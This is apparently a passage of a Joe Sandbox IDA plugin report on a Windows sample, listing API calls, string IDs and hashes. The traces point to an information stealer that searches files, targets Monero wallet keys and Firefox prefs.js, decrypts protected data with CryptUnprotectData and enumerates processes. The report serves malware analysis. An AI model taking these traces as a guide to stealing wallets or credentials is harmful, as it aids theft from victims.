                  • Instruction Fuzzy Hash: 865136B2900218ABCB24EBB4DC45EEE737CFB98300F444598B65D96140DB75DB899F72
                  APIs
                  • wsprintfA.USER32 ref: 00D3ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D3ED55
                  • StrCmpCA.SHLWAPI(?,00D51538), ref: 00D3EDAB
                  • StrCmpCA.SHLWAPI(?,00D5153C), ref: 00D3EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3F2AE
                  • FindClose.KERNEL32(000000FF), ref: 00D3F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                  • Instruction ID: f3e1a19a09c6271c50a2559fd4154a2a590b6aa7f23adb607653ab60b373f78c
                  • Opcode Fuzzy Hash: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                  • Instruction Fuzzy Hash: 10E1AF72951128ABFB55FB64DC52EEE7338EF54300F414599B50A62092EE306F8ACF72
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: C3w$ X3_$ X3_$7Uw$>$W:$GH{:$R)z$o@|u$}\rw$}\rw$A/$ojg
                  • API String ID: 0-161611651
                  • Opcode ID: 68e4f5344e4657204b65b9edd02c6a0c4e7b9964b119d7cdbc4f3b01e0b234fe
                  • Instruction ID: b217039df361b52fa1f7f178e632a07d00e623d97eed6c6226666279d97c6e55
                  • Opcode Fuzzy Hash: 68e4f5344e4657204b65b9edd02c6a0c4e7b9964b119d7cdbc4f3b01e0b234fe
                  • Instruction Fuzzy Hash: 8DB2F6F3A0C204AFE704AF29EC8567ABBE5EF94720F16493DEAC4C3740E63558458697
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515B8,00D50D96), ref: 00D3F71E
                  • StrCmpCA.SHLWAPI(?,00D515BC), ref: 00D3F76F
                  • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00D3FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                  • Instruction ID: f50455b1ed5ae4b23b5da05b335e6b5f6252c761a3fe7b043a96e919945107a9
                  • Opcode Fuzzy Hash: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                  • Instruction Fuzzy Hash: 83B103719401189BDB24FF64DC96FEE7379EF94300F4085A9A80A96151EF30AB49CFB2
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D5510C,?,?,?,00D551B4,?,?,00000000,?,00000000), ref: 00D31923
                  • StrCmpCA.SHLWAPI(?,00D5525C), ref: 00D31973
                  • StrCmpCA.SHLWAPI(?,00D55304), ref: 00D31989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D31D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00D31DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D31E20
                  • FindClose.KERNEL32(000000FF), ref: 00D31E32
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                  • Instruction ID: 3f16e45d94f0651284f9f78644363def1c608f383060d45a0d1f022562ed99cb
                  • Opcode Fuzzy Hash: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                  • Instruction Fuzzy Hash: 90121E71950118ABEB19FB64DC96EEE7378EF54300F4145A9B50A62091EF306F89CFB2
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00D50C2E), ref: 00D3DE5E
                  • StrCmpCA.SHLWAPI(?,00D514C8), ref: 00D3DEAE
                  • StrCmpCA.SHLWAPI(?,00D514CC), ref: 00D3DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3E3E0
                  • FindClose.KERNEL32(000000FF), ref: 00D3E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                  • Instruction ID: f0ae026ba27d94ff183f41b72f25efc8ffa20efc66cdbcbc9526c5bfa3761740
                  • Opcode Fuzzy Hash: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                  • Instruction Fuzzy Hash: 79F17D718541289BEB15EB64DC96EEE7338FF54304F9141DAA41A62091EF306F8ACF72
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D514B0,00D50C2A), ref: 00D3DAEB
                  • StrCmpCA.SHLWAPI(?,00D514B4), ref: 00D3DB33
                  • StrCmpCA.SHLWAPI(?,00D514B8), ref: 00D3DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3DDCC
                  • FindClose.KERNEL32(000000FF), ref: 00D3DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                  • Instruction ID: 029664e6f4bb696c25dc6c440fec34672b04335a7a58fe3eb093ca3f7ac7904c
                  • Opcode Fuzzy Hash: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                  • Instruction Fuzzy Hash: 64913172900118ABDB14FB74EC569ED737DEF94300F418668F90A96181EE349B598FB3
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00D505AF), ref: 00D47BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00D47BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D47C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D47C62
                  • LocalFree.KERNEL32(00000000), ref: 00D47D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                  • Instruction ID: d7bd04513c9b0b82fe4e31eba809ba8bffe8b2b198257dc52f367b5b45b236f8
                  • Opcode Fuzzy Hash: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                  • Instruction Fuzzy Hash: DF413C71940218ABDB24DF94DC99BEEB7B8FF44700F204199E50962191DB346F89CFB2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (';s$Dzto$Ty}_$lw~$xJMo$o/$EUv
                  • API String ID: 0-1288683632
                  • Opcode ID: 759d0c823a25f662f1b666a7b0ff3117566299add40fee1f678a949f9afb1ce7
                  • Instruction ID: 9236e614e4fd8908f771de20e1586c7089ead2b9837ce45c0abc06bd9ed7d4f3
                  • Opcode Fuzzy Hash: 759d0c823a25f662f1b666a7b0ff3117566299add40fee1f678a949f9afb1ce7
                  • Instruction Fuzzy Hash: AEB2F4F3A0C2109FE7046E29EC8567AFBE9EF94720F1A493DEAC587744E63558008797
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00D50D73), ref: 00D3E4A2
                  • StrCmpCA.SHLWAPI(?,00D514F8), ref: 00D3E4F2
                  • StrCmpCA.SHLWAPI(?,00D514FC), ref: 00D3E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                  • Instruction ID: 6be5f57856d81976af004421d3024e42322c7e323ee9f88ee36b442bd0c6d416
                  • Opcode Fuzzy Hash: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                  • Instruction Fuzzy Hash: 74121072950118ABEB14FB64DC96EED7378EF94300F4145A9B50AA6091EF306F49CFB2
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                  • lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                  • lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                  • lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 4fbf15880e6ca6eb212aea386dd5ac64ca229d3b172e9b6dd58a76328eac2a30
                  • Instruction ID: fd7de00554fd5d469e698d3289e9b37cd490d26014f38983f274d77d0f28cf92
                  • Opcode Fuzzy Hash: 4fbf15880e6ca6eb212aea386dd5ac64ca229d3b172e9b6dd58a76328eac2a30
                  • Instruction Fuzzy Hash: EF4170B591421EDFDB10DF90DD89BFEB7B8BB88705F1041A8E509A6280D7705A84DFA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D3724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D37254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D37281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D372A4
                  • LocalFree.KERNEL32(?), ref: 00D372AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 60ca03eb4728d864d7c5f140a560fab3a55ad206554a900b17c5001551236a41
                  • Instruction ID: a0f14374a0a4ed0602348e83a3ca322f6cd93249f4f57fa4afbeb20d22f0c997
                  • Opcode Fuzzy Hash: 60ca03eb4728d864d7c5f140a560fab3a55ad206554a900b17c5001551236a41
                  • Instruction Fuzzy Hash: 9B0152B5A40208BBDB10DFD4CD46F9E7778EB44700F104054FB09AB2C0D6B0AA409B66
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D4961E
                  • Process32First.KERNEL32(00D50ACA,00000128), ref: 00D49632
                  • Process32Next.KERNEL32(00D50ACA,00000128), ref: 00D49647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00D4965C
                  • CloseHandle.KERNEL32(00D50ACA), ref: 00D4967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 626d855e5582ba2ab2215a5cc3b3dae0534022bdd73c80f4c8029e4d98054f31
                  • Instruction ID: 4ee5a42057771e3a31d93aa1a58a769cf60671df3c376c2c6afd4742fdf733d6
                  • Opcode Fuzzy Hash: 626d855e5582ba2ab2215a5cc3b3dae0534022bdd73c80f4c8029e4d98054f31
                  • Instruction Fuzzy Hash: 48011E75A00208EBCF14DFA5CD58BEEB7F8EB48301F114188A90997280D7349B80DF62
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mc$_d>$_|?$}-?Y
                  • API String ID: 0-131802988
                  • Opcode ID: 778d754a8b55475f14ff84e230236e591c3a1caa2e50adf77f14ae9cdc3e4f4d
                  • Instruction ID: 3bb7f40b6b7c3fcab1471f9b455bb18227eae9690f02513b9057e1043e172bba
                  • Opcode Fuzzy Hash: 778d754a8b55475f14ff84e230236e591c3a1caa2e50adf77f14ae9cdc3e4f4d
                  • Instruction Fuzzy Hash: 18B206F3A082049FE304AE2DEC8567ABBE5EF94320F1A493DEAC5C7744E63558058797
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D505B7), ref: 00D486CA
                  • Process32First.KERNEL32(?,00000128), ref: 00D486DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00D486F3
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • CloseHandle.KERNEL32(?), ref: 00D48761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 3aae8c1ff3ea28ac74c2c85773fdc52f4e3cc7c4031706ba3c82fdfcd63614ce
                  • Instruction ID: c6aaabc0814f4796f5c9e8047aec75910ba3f5f0d96f2c58fa041177af550b93
                  • Opcode Fuzzy Hash: 3aae8c1ff3ea28ac74c2c85773fdc52f4e3cc7c4031706ba3c82fdfcd63614ce
                  • Instruction Fuzzy Hash: 20312B71941218ABDB24DF54DC55FEEB778EF45700F104199E50AA61A0DB306A89CFB2
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00D35184,40000001,00000000,00000000,?,00D35184), ref: 00D48EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 10d526b4fbf9630c705398c801ab458f032dac51d314a13cfeb82f7e6d7a5d0a
                  • Instruction ID: eaccbf661ddf919203f35a69ca8b57278e3e6f11e164508d3a122650a359e6e8
                  • Opcode Fuzzy Hash: 10d526b4fbf9630c705398c801ab458f032dac51d314a13cfeb82f7e6d7a5d0a
                  • Instruction Fuzzy Hash: 71111874200208BFDB00CF64D884FAF73A9AF89740F149458F9198B250DB76EC85EB71
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
